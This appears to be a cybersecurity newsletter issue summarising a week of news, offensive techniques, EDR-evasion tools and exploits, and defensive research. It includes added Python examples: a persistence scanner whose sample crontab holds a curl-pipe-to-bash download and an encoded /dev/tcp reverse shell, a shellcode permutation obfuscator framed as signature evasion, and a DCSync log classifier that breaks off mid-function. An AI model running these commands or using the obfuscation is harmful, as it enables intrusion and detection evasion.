Last Week in Security - 2024-10-21

We're Hiring!
Immediate Open Positions:
Maryland Applicants:
We have openings for a Cryptologic Computer Scientist, Cyber Operator Developer Analyst, Ethical Hacker, Information Assurance Specialist, Information Systems Security Officer, Jr. Offensive Cyber Operator, Red/Blue Team Engineer, Senior Web Application Penetration Tester, Systems Engineer, Data Scientist, HPC Software Engineer, Information Systems Security Engineer, and Reverse Engineer.
Virginia Applicants:
Available opportunities: DevSecOps Engineer and Red Team Operator - Senior.
For more open positions visit: https://www.sixgen.io/careers
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools, and exploits from the past week. This post covers 2024-10-14 to 2024-10-21.
News
How Low Can You Go? An Analysis of 2023 Time-to-Exploit Trends - Mandiant analyzed 138 vulnerabilities from 2023 and found that the majority were exploited as zero-days, with a growing use of zero-days over time. The average time-to-exploit (TTE) dropped significantly in 2023, with exploits happening quickly after patches were released. The analysis also looked at how exploitation timelines were influenced by factors like exploit availability and difficulty. The data showed that threat actors are continuing to target both zero-days and n-days, with the expectation of quicker exploitation timelines across a larger range of targets in the future.
Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations - Iranian cyber actors have been using brute force and credential access techniques to compromise critical infrastructure organizations, including sectors like healthcare, government, and energy. They aim to obtain credentials and network information to sell to cybercriminals, enabling them to access the organizations. The actors have been using methods like password spraying and MFA 'push bombing' since October 2023, as well as tools like VPN services and RDP for lateral movement.
Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach - A 33-year-old Brazilian man known as "USDoD," a prolific cybercriminal, was arrested by Brazilian authorities for breaching the FBI's InfraGard program and leaking its member data. USDoD was also behind the breach at the consumer data broker National Public Data, which exposed Social Security numbers for a significant portion of the U.S. population. USDoD admitted stealing that data but claimed not to have leaked or sold it. The FBI declined to comment on the arrest. USDoD had publicly announced his retirement from cybercrime, but kept posting exploit code online afterwards.
U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now - The U.S. and UK governments issued a joint advisory on Russian state-sponsored activity by APT29 (the SVR group behind the SolarWinds compromise), listing the vulnerabilities the group is exploiting. GreyNoise reports that nine of the 12 vulnerabilities from the advisory that it tracks are being actively probed by attackers right now.
Capture the (red) flag: An inside look into China’s hacking contest ecosystem - The Atlantic Council wrote a detailed examination of China’s hacking contest ecosystem. It explores the role these contests play in fostering cybersecurity talent and innovation while also providing insight into how vulnerabilities discovered in these events are used for both defense and offense. The report highlights China's integration of such contests with state-sponsored cyber activities, illustrating their importance to the nation's cyber capabilities and strategies.
Techniques and Write-ups
Introducing Early Cascade Injection: From Windows Process Creation to Stealthy Injection - In this blog post, Early Cascade Injection is introduced as a novel process injection technique that targets the user-mode part of Windows process creation. This technique combines elements of Early Bird APC Injection and EDR-Preloading and aims to be effective against top-tier EDRs. The blog also delves into the internals of Windows process creation, Early Bird APC Injection, EDR-Preloading, and how Early Cascade Injection interacts with them. The post outlines the process of Windows process creation, the loading mechanism and timing of EDR user-mode detection measures, and how Early Cascade Injection bypasses EDR detection effectively.
Bypass YARA Rule f0b627fc for CobaltStrike to Evade EDRs - The blog post explains how to bypass the YARA rule f0b627fc targeting Cobalt Strike's signature shellcode by replacing key bytes with alternative shellcode and randomizing the shellcode with NOP instructions to evade EDR detection. By altering the instruction and using alternative shellcode sequences, it becomes harder for static analysis tools to detect the modified shellcode. The post also provides a script for implementing the bypass and includes key considerations for implementing shellcode alternatives. Additionally, the post mentions a shellcode loader called Indirect Waffles that leverages advanced techniques to evade EDR detection and enhance payload delivery.
I Know Which Device You Used Last Summer: Fingerprinting WhatsApp Users’ Devices - Security researchers found that Meta's WhatsApp is leaking information about users' device setups, including the number and types of devices used. This can provide valuable information to potential attackers for reconnaissance purposes. By analyzing message IDs, attackers can also determine the operating systems of users' devices, allowing for targeted attacks. Despite reporting the issue to Meta, the company has not responded, leading the researchers to make the information public.
Beyond the good ol' LaunchAgents - 35 - Persist through the NVRAM - The 'apple-trusted-trampoline' - This blog post discusses a unique persistence technique for macOS called 'apple-trusted-trampoline' that involves setting a binary in NVRAM to execute upon system boot. The technique can only be implemented when System Integrity Protection (SIP) is disabled. The author found the method interesting but largely impractical due to the limitations and dependencies on SIP status. The blog provides in-depth details on how to set up and execute the 'apple-trusted-trampoline' persistence method.
CloudGoat: New Scenario and Walkthrough (sns_secrets) - Rhino Security Labs has released a new scenario and walkthrough for CloudGoat, a platform for cloud security challenges. The scenario, SNS Secrets, involves enumerating IAM permissions, discovering SNS topics, and accessing API Gateways. The walkthrough includes instructions for configuring access keys in the AWS CLI, performing IAM role enumeration using the AWS CLI and Pacu, and identifying SNS topics using Pacu. By following these steps, users can gain a deeper understanding of AWS misconfigurations and enhance their AWS penetration testing skills.
Let’s Clone a Cloner - Part 2: You Have No Power Here - Part 2 of a series on building a long-range RFID badge cloner for physical security assessments. The author investigates power-related issues limiting the device's read range, testing different battery configurations to find an adequate supply. A more powerful battery pack ultimately yields a significant improvement in range. The article closes with plans for further modifications in part 3 of the series.
Fortinet FortiGate CVE-2024-23113 - A Super Complex Vulnerability In A Super Secure Appliance In 2024 - CVE-2024-23113 is a format string vulnerability in the fgfmd daemon (the FortiGate-to-FortiManager protocol handler) of Fortinet FortiOS, affecting all currently-maintained branches. It allows unauthenticated remote code execution and has been exploited in the wild. Researchers at watchTowr analyzed and reproduced the bug, finding exploitation more complex than expected but still achievable with the right approach. They also found that exposure varies by version, with some builds requiring a trusted certificate before the vulnerable code path can be reached.
DLL Sideloading - This blog discusses the concept of DLL Sideloading as a technique to execute custom malicious code from legitimate Windows binaries, providing details on how to detect vulnerabilities and exploit the technique. It also explains the process of conducting DLL Proxying for more evasive attacks and provides a practical example of weaponizing Sideloading for C2 payload execution by downloading and executing a malicious DLL in the target system.
Vulnerabilities of Realtek SD card reader driver, part 1 - The vulnerabilities in the Realtek SD card reader driver, RtsPer.sys, allow non-privileged users to leak kernel memory, write to arbitrary kernel memory, and read and write physical memory from user mode. These vulnerabilities have been present for years, affecting laptops from various OEMs, including Dell and Lenovo. Realtek released fixes for some vulnerabilities in April 2022, with the final fix for all vulnerabilities being released in July or August, in version 10.0.26100.21374 or higher. The second part of the blog post will delve into accessing physical memory via DMA and discuss the disclosure timeline and tools used in the research.
Using Offensive .NET to Enumerate and Exploit Active Directory Environments - This blog post discusses using .NET to enumerate and exploit Active Directory environments. The author argues that the .NET Framework is the most practical platform for building offensive Active Directory tooling because it ships on every Windows host and exposes the relevant directory APIs natively. The post provides examples of LDAP enumeration, enumerating Domain Controllers, and mapping trust relationships between domains. It also covers DACL-focused exploitation such as writing to msDS-AllowedToActOnBehalfOfOtherIdentity (resource-based constrained delegation) and servicePrincipalName (targeted Kerberoasting), adding users to groups, and changing user passwords. The post emphasizes the ease and effectiveness of using .NET for offensive Active Directory interactions.
Bypassing noexec and executing arbitrary binaries - The article introduces a method to bypass the "noexec" restriction on Linux systems and execute arbitrary binaries using only Bash, syscall(2) calls, and core utilities. The process involves creating a memory-backed file descriptor and modifying the process image to execute the downloaded binary without touching the file system. The trick can be useful in scenarios where users do not have permission to write or execute files on the host. Different variants of the trick using Perl and PHP are also discussed, with potential limitations in certain environments such as SELinux or GRSecurity.
Spec-tac-ula Deserialization: Deploying Specula with .NET - The article discusses how .NET deserialization can be used for Red Team operations, specifically with the tool Specula. It outlines the process of finding a vulnerable application and creating a payload to exploit it. The article also demonstrates how to backdoor a workstation with Specula by setting registry keys using .NET code, and explains how a gadget chain works to reflectively load an assembly into memory and execute its default constructor.
Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism - Unit 42 researchers have identified weaknesses in the Gatekeeper security mechanism on macOS, which is designed to ensure only trusted software runs on the system. Certain third-party utilities and applications do not enforce the necessary quarantine attribute, potentially allowing for Gatekeeper bypasses and leaving users vulnerable to malicious content. Apple expects developers to comply with security guidelines, but some built-in utilities and third-party applications do not, creating potential security risks.
SAS CTF and the many ways to persist a kernel shellcode on Windows 7 - The blog post discusses a kernel shellcode persistence technique used in APT attacks, focusing on a challenge from the SAS CTF competition. The technique involves exploiting a flaw in Windows 7/Windows Server 2008 R2 that allows hidden kernel shellcode in the system registry to be executed during system boot. The post provides technical details on the flaw, the challenges faced in the competition, and the steps taken to analyze and decrypt the shellcode.
Practical Examples of URL Hunting Queries - Part 1 - This guide provides practical examples of URL hunting queries, including searching for specific domain names, file URLs, and IP addresses without domains. It also includes techniques for decoding malware scripts and tracking malicious infrastructure through DNS records, with a focus on defeating obfuscation and identifying APT domains.
CVE-2024-45844: Privilege escalation in F5 BIG-IP - CVE-2024-45844 is a privilege escalation vulnerability in F5 BIG-IP appliances: a user with CLI access could send crafted messages to the MCP (master control program) daemon that it should not have been authorized to send. By exploiting this issue, attackers could create new root-level accounts, change user roles, or modify passwords. F5 acknowledged the vulnerability and patched it in fixed versions. F5 recommended limiting CLI access to trusted users and noted that its newer architecture applies a zero-trust model between components to prevent this class of vulnerability.
Over 7 Million WooCommerce Sites Affected by a Simple HTML Injection: CVE-2024–9944 Analysis - A security researcher discovered an HTML injection vulnerability in WooCommerce that affected over 7 million sites. The vulnerability allowed malicious users to inject arbitrary HTML into the "Order Notes" field, which could be used for phishing or other social engineering against store staff. The issue was patched in WooCommerce version 9.1.0, and users are advised to update to the latest version. The researcher reported the bug to Automattic via HackerOne, and it was assigned a CVE number in October 2024.
Escaping the Chrome Sandbox Through DevTools - In this blog post, the author describes finding vulnerabilities in the Chromium web browser, specifically CVE-2024-6778 and CVE-2024-5836, which allowed for a sandbox escape from a browser extension through user interaction. The bugs enabled a malicious Chrome extension to run shell commands on a PC, potentially leading to the installation of malware. By exploiting a feature in the Chrome devtools API and a race condition, the author was able to create a reliable exploit chain that triggered a sandbox escape, resulting in a $20,000 reward from Google.
Spoofing Internal Packets for Multihomed Linux Devices - Anvil Secure has discovered a vulnerability in multihomed Linux devices that allows for the spoofing and injection of packets into internal communication streams via an external interface, even when IP Forwarding is disabled. This vulnerability can be exploited by an attacker with a foothold on an adjacent network. The white paper authored by Anvil Secure outlines this issue and provides exploit scenarios, recommending the use of anti-spoofing firewall rules to mitigate the risk.
Hacking Android Games - The blog post discusses hacking Android games, specifically Unity games, and the process of reverse engineering them to recover the game's managed code using tools like Il2CppDumper and dnSpy. It also covers dynamic approaches using Cheat Engine and static analysis with dnSpy to manipulate game values. The post highlights using Frida for dynamic analysis and tracing classes to hook game functions such as increasing in-game money, showing the process with screenshots and code examples.
Reverse engineering a dead MOTU audio interface to detect its failure - The author purchased a malfunctioning MOTU Ultralite AVB audio interface and attempted to diagnose and repair it without access to service manuals or technical support. By reverse engineering the device, they discovered that a faulty integrated circuit responsible for communicating over the I2C bus was causing the issue. After replacing the component, the audio interface began functioning properly again. This experience provided the author with valuable insights into the inner workings of the device and the process of reverse engineering hardware.
Finding Vulnerability Variants at Scale - A security audit turned up a memory-safety bug in a JPEG decompression routine (an integer overflow leading to a heap buffer overflow) and then found variants of the same bug in popular projects including Chromium, Electron, and WINE. Automated and manual processes were used to identify the vulnerable pattern across multiple repositories, resulting in the discovery of over 40 affected projects. The findings have been reported to vendors for mitigation, and the methodology is shared to help other security researchers extend their audits with variant analysis and contribute to a more secure software ecosystem.
Linux Persistence Mechanisms and How to Find Them - Linux persistence mechanisms are used by attackers to maintain access to compromised systems after reboots or updates. Methods include modifying systemd services, using cron jobs, utilizing malicious packages, modifying user passwords, and more. Detection tools like auditd and Sysmon can help track and respond to suspicious activities. Understanding these persistence techniques is crucial for defending against persistent threats on Linux systems.
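The persistence mechanisms above (cron jobs, systemd services) leave text artefacts that can be scanned on a host or from a forensic image. The following scanner is an added example written for this newsletter, not code from the linked post: it runs a small set of heuristic rules over a constructed crontab and a constructed systemd unit, and decodes base64 blobs it finds so that an encoded reverse shell is caught by the same rules. The sample artefacts and the rule names are invented for the demonstration.

```python
import base64
import re

# Heuristic indicators commonly seen in cron/systemd persistence. Each is a
# (name, compiled regex) pair applied to a single command line.
RULES = [
    ("remote-script-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("base64-decoded-command", re.compile(r"base64\s+(-d|--decode)")),
    ("exec-from-temp-or-hidden",
     re.compile(r"(^|[\s=\"'])(/tmp|/dev/shm|/var/tmp)/|/\.[A-Za-z0-9_-]+/")),
    ("bash-dev-tcp", re.compile(r"/dev/(tcp|udp)/")),
]
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Constructed sample artefacts (not real data). Line 4 of the crontab carries
# base64 for: bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.10/x.sh | bash
@reboot /bin/bash -c "$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDMuMC4xMTMuMTAvNDQ0NCAwPiYx | base64 -d)"
"""
SAMPLE_UNIT = """\
[Unit]
Description=System update helper
[Service]
ExecStart=/tmp/.cache/update -c 203.0.113.10
Restart=always
[Install]
WantedBy=multi-user.target
"""


def _match_rules(text):
    return [name for name, rx in RULES if rx.search(text)]


def _decoded_blobs(text):
    """Return the UTF-8 text of every base64 run long enough to hide a command."""
    out = []
    for blob in B64_BLOB.findall(text):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
    return out


def _scan_command(source, lineno, cmd):
    findings = [(source, lineno, name) for name in _match_rules(cmd)]
    for decoded in _decoded_blobs(cmd):  # one level of de-obfuscation
        findings += [(source, lineno, "decoded:" + name) for name in _match_rules(decoded)]
    return findings


def scan_crontab(text, source="crontab"):
    """Every non-comment crontab line is treated as a command line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            findings += _scan_command(source, lineno, stripped)
    return findings


def scan_unit(text, source="systemd-unit"):
    """Only Exec* directives (ExecStart, ExecStartPre, ExecStop, ...) run commands."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        key, sep, value = line.partition("=")
        if sep and key.strip().startswith("Exec"):
            findings += _scan_command(source, lineno, value.strip())
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB) + scan_unit(SAMPLE_UNIT):
        print("%-12s line %d: %s" % f)
```

On a live host the same functions can be fed the contents of /etc/crontab, /etc/cron.d/*, each user's crontab, and the unit files under /etc/systemd/system and ~/.config/systemd/user; the rules are deliberately coarse and are a starting point for triage, not a verdict.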
Popping Android Vulnerabilities From Notification to WebView XSS - This article discusses the vulnerabilities in Android apps that can be exploited from notifications to WebView XSS. The author highlights the importance of understanding Android app vulnerabilities beyond just bypassing root detection or SSL pinning. They provide a detailed example of exploiting a WebView through a maliciously crafted intent, emphasizing the need for proper validation of external sources and the use of PendingIntent for restricted access. The article also mentions the use of a dynamic ClassLoader in Android to create objects that the app will accept as legitimate, bypassing type checks.
Unmasking CVE-2024-38178: The Silent Threat of Windows Scripting Engine - CVE-2024-38178 is a type confusion vulnerability in the Windows Scripting Engine that allows remote code execution on targeted Windows systems. The vulnerability was exploited by a North Korea-based threat group, APT37, in June 2024. The exploit process involves bypassing a previous patch (CVE-2022-41128) by manipulating variables initialized with arithmetic conversion operators.
Abusing AD-DACL : Generic ALL Permissions - This post explores the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Directory environments, allowing for unrestricted access to user attributes. Attack vectors such as Kerberoasting, password resets, and account manipulation are discussed, with a focus on detection and mitigation. The post provides detailed lab setups, methods of exploitation, and tools like Bloodhound, Net RPC, and Powerview to demonstrate how attackers can abuse these permissions to gain domain dominance and compromise Active Directory systems.
Shellcode: Obfuscation with Permutations - The post discusses the use of permutations for obfuscation in shellcode. It covers topics like Linear Congruential Generators, Inversive Congruential Generators, Affine Transformations, Modular Multiplication, Modular Involutions, and the Lehmer Random Number Generator. The post also explores the application of these concepts in cryptography, hash functions, and ciphers. Additionally, it provides code examples and explanations of how these techniques can be implemented in programming languages like C and Python.
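As an added illustration of the permutation idea (this is example code written for the newsletter, not the post's own implementation): a full-period LCG over a power-of-two modulus visits every residue exactly once, so keeping only the outputs below the shellcode length (cycle-walking) yields a bijection on byte positions that a decoder can regenerate from just (a, c, seed). The Hull-Dobell check and an affine (modular multiplication) permutation are included because the post covers both; the 10-byte "shellcode" is a constructed sample and is never executed.

```python
from math import gcd

# Constructed sample payload: x86-64 Linux exit(0) stub, used only as bytes to shuffle.
SAMPLE_SHELLCODE = bytes.fromhex("4831ff" "b83c000000" "0f05")


def _prime_factors(n):
    factors, p = set(), 2
    while p * p <= n:
        while n % p == 0:
            factors.add(p)
            n //= p
        p += 1
    if n > 1:
        factors.add(n)
    return factors


def full_period_lcg_params(m, a, c):
    """Hull-Dobell theorem: x_{i+1} = (a*x_i + c) mod m has period m iff
    gcd(c, m) == 1, (a - 1) is divisible by every prime factor of m,
    and (a - 1) is divisible by 4 whenever m is."""
    if gcd(c, m) != 1:
        return False
    if any((a - 1) % p for p in _prime_factors(m)):
        return False
    if m % 4 == 0 and (a - 1) % 4:
        return False
    return True


def lcg_permutation(n, a, c, seed=0):
    """Permutation of range(n) from an LCG over m = next power of two >= n.
    Outputs >= n are skipped (cycle-walking), which keeps the bijection."""
    m = 1 << (n - 1).bit_length()
    if not full_period_lcg_params(m, a, c):
        raise ValueError("LCG parameters do not give a full period modulo %d" % m)
    perm, x = [], seed % m
    for _ in range(m):
        if x < n:
            perm.append(x)
        x = (a * x + c) % m
    assert sorted(perm) == list(range(n))  # sanity: every position exactly once
    return perm


def affine_permutation(n, a, b):
    """i -> (a*i + b) mod n is a bijection on range(n) iff gcd(a, n) == 1."""
    if gcd(a, n) != 1:
        raise ValueError("multiplier must be coprime with n")
    return [(a * i + b) % n for i in range(n)]


def permute(data, perm):
    """Encoder: output position i receives input byte perm[i]."""
    return bytes(data[perm[i]] for i in range(len(data)))


def unpermute(data, perm):
    """Decoder (what a loader stub does at runtime): input byte i goes back to perm[i]."""
    out = bytearray(len(data))
    for i, p in enumerate(perm):
        out[p] = data[i]
    return bytes(out)


if __name__ == "__main__":
    perm = lcg_permutation(len(SAMPLE_SHELLCODE), a=5, c=3)
    scrambled = permute(SAMPLE_SHELLCODE, perm)
    print("perm      :", perm)
    print("scrambled :", scrambled.hex())
    print("restored  :", unpermute(scrambled, perm).hex())
```

The point for a loader is that the encoded buffer stores none of the original byte order; the stub needs only the three integers to rebuild the permutation, and because the transformation is a pure reordering it is cheap to invert in place and leaves no recognizable instruction sequences for a byte-pattern signature.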
BannleEye - Banning arbitrary players using BE - The post releases a tool called BannleEye that allows a user to permanently ban any player in games using the BattlEye anti-cheat system. It provides a detailed explanation of how the tool works and how the ban mechanism can be abused against arbitrary users. The post also discusses the underlying weaknesses in the BattlEye system and suggests ways to fix them.
Cross-Process Spectre Exploitation - The author developed a cross-process Spectre attack exploiting an incomplete Indirect Branch Prediction Barrier (IBPB) in Intel processors, discovering a bug that retains return target predictions across IBPBs. The attack focuses on exploiting shared branch prediction state across processes running on the same core. The author hopes to raise awareness among software authors to enable IBPB for protection against such attacks. The attack involves training a victim process in order to leak secret information using a ROP-gadget chain and exploiting noisy results to deduce the leaked information. The author also discusses derandomizing ASLR to reveal the victim's address space layout.
I hate you COM – Pitfalls of COM object activation - The author describes their struggles with COM object activation and compatibility issues with the CLR in the context of dotnet unmanaged-api. They discuss how the issue was resolved by loading the correct version of mscordbi.dll and using the correct APIs to instantiate the COM class. The post also provides a solution in the form of C++ code to manually activate a COM class. Ultimately, the author was able to successfully invoke the desired interface methods after addressing the compatibility issue.
Exception Junction - Where All Exceptions Meet Their Handler - This blog post covers challenges encountered while debugging and researching new features for Brute Ratel, and uses them to dig into Windows exception handling, in particular Vectored Exception Handling (VEH) and how it differs from Structured Exception Handling (SEH). The author walks through the relevant Windows internals, the process of creating a custom vectored exception handler, and the intricacies of the undocumented 'LdrpVectorHandlerList' structure that ntdll uses to track registered handlers. The post concludes by highlighting the social responsibility of detection engineers and provides a detection rule for identifying anomalies in 'LdrpVectorHandlerList'.
Call and Register — Relay Attack on WinReg RPC Client - Akamai's write-up of "WinReg Relay" (CVE-2024-43532), an NTLM relay vulnerability in the Windows Remote Registry (WinReg) RPC client. When the client cannot reach the remote registry over its primary transport (SMB named pipes), it falls back to older transports with weak authentication settings, allowing an attacker to relay the client's NTLM authentication to another service (for example AD CS) and gain unauthorized access. The post explains the fallback mechanism, demonstrates exploitation, and discusses mitigations.
Tools and Exploits
Ghost - Ghost is a shellcode loader project designed to bypass detection capabilities typically implemented by EDRs. It uses fiber threads to avoid kernel callbacks, stack spoofing techniques to evade stack unwinding, and a shellcode hiding technique using random cryptographic data. Other evasion techniques include suspended processes, stopping ETW, and custom API hashing. Ghost relies on understanding how the beacon sleeps and can be customized for different C2 beacons.
Sharelord - The GitHub repository "Sharelord" is a .NET assembly project that creates network shares, sets ACE entries for directories, sets share permissions, and deletes shares. It is a learning project for C# that demonstrates how to interact with Win32 APIs. The project includes a command-line tool for managing Windows shared folders and their permissions, with commands like creating shared folders, setting file system permissions, setting share-level permissions, and deleting shares.
Proxll - Proxll is a tool designed to simplify the generation of proxy DLLs and address common conflicts related to windows.h. It involves steps such as locating a DLL opportunity, compiling ProxllGen.exe, generating a proxy DLL template, and compiling the proxy DLL. The tool helps automate the process of creating proxy DLLs to prevent crashes and execute malicious code safely. By separating functions with windows.h dependencies from the exported functions, Proxll resolves conflicts and simplifies the DLL generation process.
memexec - The GitHub repository "hackerschoice/memexec" provides a method for circumventing the "noexec" mount flag on Linux systems to execute arbitrary binaries without using ptrace or process injection. The scripts included in the repository allow for executing binaries that do not need the executable permission and can be loaded from a noexec-partition or directly from the Internet. This technique works as a non-root user and can be used to bypass restrictions such as PHP's "exec" restrictions.
CVE-2024-35250 - The GitHub repository "varwara/CVE-2024-35250" contains a Proof of Concept (PoC) for the Untrusted Pointer Dereference vulnerability in the ks.sys driver.
ghostport - Ghostport is a high-performance port spoofing tool built in Rust that confuses port scanners with dynamic service emulation across all ports. It features customizable signatures, efficient asynchronous handling, and easy traffic redirection. Users can easily run Ghostport with command-line interface or through cargo, and can redirect all incoming TCP traffic to Ghostport using iptables.
Recon Royale - Recon Royale is a competitive platform where participants submit subdomains for a target domain to earn points. The system uses CloudFlare's DoH service to process and validate subdomains, rewarding points for valid submissions and deducting points for invalid ones. Participants can only submit once per round, with rounds ending daily at midnight UTC+2. The top participant in the leaderboard is awarded a crown, and targets are selected from public bug bounty programs.
Argus - Argus is an all-in-one, Python-powered toolkit designed for information gathering and reconnaissance, featuring a user-friendly interface and powerful modules. It can be used for research, security assessments with proper authorization, or exploring network infrastructures. The toolkit offers tools for network and infrastructure, web application analysis, and security and threat intelligence, with modules like DNS over HTTPS, Broken Links Detection, and Data Leak Detection. Users can launch Argus from the command line and follow prompts to gather information efficiently.
CVE-2024-30090 - LPE PoC - This GitHub repository contains a Proof of Concept (PoC) for a Local Privilege Escalation (LPE) vulnerability identified as CVE-2024-30090. The PoC demonstrates how an attacker can exploit this vulnerability to escalate privileges on a Windows system.
LsassReflectDumping - The GitHub repository Offensive-Panda/LsassReflectDumping contains a tool that clones the lsass.exe process using the Process Forking technique and the RtlCreateProcessReflection API. Once the clone is created, it generates a memory dump of the cloned process using MINIDUMP_CALLBACK_INFORMATION callbacks. The tool can be executed to create a dump file, which can then be parsed offline using tools like Mimikatz or Pypykatz to extract logon passwords.
vulnhuntr - Vulnhuntr is a tool that uses Large Language Models (LLMs) and static code analysis to autonomously discover vulnerabilities in Python codebases. It automatically analyzes code call chains starting from user input to server output to detect complex security vulnerabilities such as remote code execution, cross-site scripting, and SQL injection. The tool generates detailed reports with vulnerability assessments, context functions and class references, confidence scores, and logs of the analysis process.
CVE-2024-9264 - The GitHub repository contains an exploit for CVE-2024-9264, an arbitrary file-read vulnerability in Grafana. The exploit shows how an authenticated user can run a DuckDB SQL query through the SQL Expressions feature to read arbitrary files from the server's filesystem. Grafana released fixed versions that remove the SQL Expressions feature. Exploitability depends on whether the DuckDB binary is present on the Grafana server, so patching and removing DuckDB both reduce the likelihood of successful exploitation.
Threat Intel and Defense
From QR to compromise: The growing “quishing” threat - Sophos X-Ops describes "quishing," a phishing technique in which attackers embed QR codes in PDF email attachments so that victims scan them with a mobile device and land on credential-harvesting pages that mimic Microsoft 365 login screens, outside the reach of the corporate email and web filtering. The attackers have been using increasingly polished lures, such as embedding logos and graphics in the QR code images, to make the attacks more convincing. Controls like Intercept X for Mobile and Microsoft Entra ID Protection can help protect against these attacks, and employee training and prompt reporting of suspicious emails remain crucial.
At Nearly $1 Billion Global Impact, the Best Cloud Security Couldn’t Stop This Hybrid Attack Path. Takeaway: Map and Close Viable Attack Paths Before Breaches Begin. - The blog discusses the significant impact of hybrid attack paths, as seen in breaches like SolarWinds and Capital One, that crossed security domains despite the best cloud security measures.
Beyond the Surface: the evolution and expansion of the SideWinder APT group - The SideWinder APT group, also known as T-APT-04 or RattleSnake, is a prolific threat group targeting military and government entities in South and Southeast Asia. They have recently expanded their activities to the Middle East and Africa, using a new post-exploitation toolkit called "StealerBot" for espionage activities. The group utilizes various infection vectors, such as spear-phishing emails with malicious attachments and LNK files, to deliver their payloads. Their operations have been observed targeting a wide range of sectors and countries, with a high level of sophistication in their techniques.
Active Cyber Defence – Taking back control - In this article, JUMPSEC discusses the importance of Active Cyber Defence, which involves proactively engaging, disrupting, and countering cyber threats. They share a success story of catching an attacker using a honeypot server, showcasing the effectiveness of such proactive measures. The article emphasizes the need for organizations to focus on specific threats they face and tailor their security measures accordingly. It also provides practical tips on implementing Cyber Deception techniques to strengthen cybersecurity defenses.
BEC-ware the phish (part 1). Investigating incidents in M365 - Part 1 of the "BEC-ware the phish" series discusses investigating incidents in M365 and the importance of key artefacts for telemetry in cases of Business Email Compromise (BEC). It emphasizes the need to verify and enable Unified Audit Logging, use Purview content search, and leverage Advanced Hunting tables for analysis. The post also covers common investigation questions, artefacts in M365 (including default and free-to-enable options), and the importance of host-based artefacts in filling gaps in investigations. It concludes with recommendations for effective investigation and remediation of email-based threats in M365.
DCSync Attack Explained - A DCSync attack is a technique in which a threat actor impersonates a domain controller and uses the directory replication protocol to pull credentials, including password hashes, from the Active Directory (AD) database without ever touching the NTDS.dit file. It requires replication rights on the domain (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which by default only domain controllers and highly privileged groups hold, and it can slip past traditional auditing because the traffic looks like normal replication. Defenders can use tools like Semperis DSP Intelligence to detect and prevent DCSync attacks, and should implement a tiered access model to reduce the number of accounts that could be abused for it.
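A native detection that complements the product mentioned above: a DCSync pulls replication data, so it shows up as a directory service access event (Event ID 4662) whose Properties field contains the replication control-access-right GUIDs. The classifier below is an added example written for this newsletter (not code from the Semperis post) and runs over constructed 4662 records; the account names, domain, and allowlists are invented for the demonstration. The GUIDs are the well-known values for the replication rights, and the ObjectType GUID is the schema ID of the domainDNS class.

```python
# Control-access-right GUIDs that appear in the Properties field of a 4662 event.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"

# Constructed sample events (not real logs), already parsed into fields. Only the
# subject, object type and the property GUIDs matter for this check.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_a1b2c3d4", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-backup", "SubjectDomainName": "CORP",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",  # user class: an ordinary read
     "Properties": "{e48d0154-bcf8-11d1-8702-00c04fb96050}"},
]

# Hypothetical allowlists: DC computer accounts and a sync account expected to replicate.
TRUSTED_DCS = {"DC01", "DC02"}
KNOWN_REPLICATORS = {"MSOL_a1b2c3d4"}


def replication_rights(event):
    """Return the set of replication right names granted in this event."""
    props = event.get("Properties", "").lower()
    return {name for guid, name in REPL_RIGHTS.items() if guid in props}


def classify_dcsync(event, trusted_dcs=TRUSTED_DCS, known=KNOWN_REPLICATORS):
    """None if not replication-related; otherwise (severity, account, rights)."""
    if event.get("EventID") != 4662:
        return None
    rights = replication_rights(event)
    if not rights:
        return None
    account = event["SubjectUserName"]
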